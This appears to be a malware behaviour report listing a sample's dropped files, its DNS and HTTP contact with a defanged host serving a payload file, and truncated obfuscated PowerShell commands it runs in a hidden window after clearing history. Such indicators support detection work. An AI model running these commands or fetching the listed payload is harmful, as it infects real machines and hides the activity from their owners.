Technical Information
- %APPDATA%\bitdb41.tmp
- %APPDATA%\bitdb41.tmp
- from %APPDATA%\bitdb41.tmp to %APPDATA%\sortliste.hjr
- 'ec#x.pt':80
- http://ec#x.pt/Fladtrykt.xsn
- DNS ASK ec#x.pt
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Clear-History;Function kapelmu ([String]$Begynderbo){$Eksamen = 5;For($Apoz=4; $Apoz -lt $Begynderbo.Length-1; $Apoz+=$Eksamen){ $Maoismen4 = $Begynderbo.Substring($Apoz, $Wirablesan); $Maoism...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Clear-History;Function kapelmu ([String]$Begynderbo){$Eksamen = 5;For($Apoz=4; $Apoz -lt $Begynderbo.Length-1; $Apoz+=$Eksamen){ $Maoismen4 = $Begynderbo.Substring($Apoz, $Wirablesan); $Maoism...
- '<SYSTEM32>\cmd.exe' /c "echo 1 && exit"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Clear-History;Function kapelmu ([String]$Begynderbo){$Eksamen = 5;For($Apoz=4; $Apoz -lt $Begynderbo.Length-1; $Apoz+=$Eksamen){ $Maoismen4 = $Begynderbo.Substring($Apoz, $Wirablesan); $Maoism...
- '%WINDIR%\syswow64\cmd.exe' /c "echo 1 && exit"